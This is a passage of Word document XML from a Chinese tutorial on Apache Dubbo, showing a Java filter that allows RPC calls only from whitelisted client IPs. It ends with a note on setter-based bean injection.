          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    //dubbo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>方式自动注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    public void setIpWhiteList(IpWhiteList ipWhiteList) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        this.ipWhiteList = ipWhiteList;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    @Override</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    public Result invoke(Invoker&lt;?&gt; invoker, Invocation invocation) throws RpcException {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (!ipWhiteList.isEnabled()) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">            LOGGER.debug("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>白名单禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">            return invoker.invoke(invocation);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        String clientIp = RpcContext.getContext().getRemoteHost();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        LOGGER.debug("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>{}", clientIp);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        List&lt;String&gt; allowedIps = ipWhiteList.getAllowedIps();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (allowedIps.contains(clientIp)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">            return invoker.invoke(invocation);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">            return new RpcResult();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="288" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>注意：只能通过setter方式来注入其他的bean，且不要标注注解！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>dubbo自己会对这些bean进行注入，不需要再标注@Resource让Spring注入，参见</w:t>
      </w:r>
      <w:hyperlink r:id="rId307" w:anchor="DeveloperGuide-zh-%E6%89%A9%E5%B1%95%E7%82%B9%E5%8A%A0%E8%BD%BD" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="333333"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>扩展点加载</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
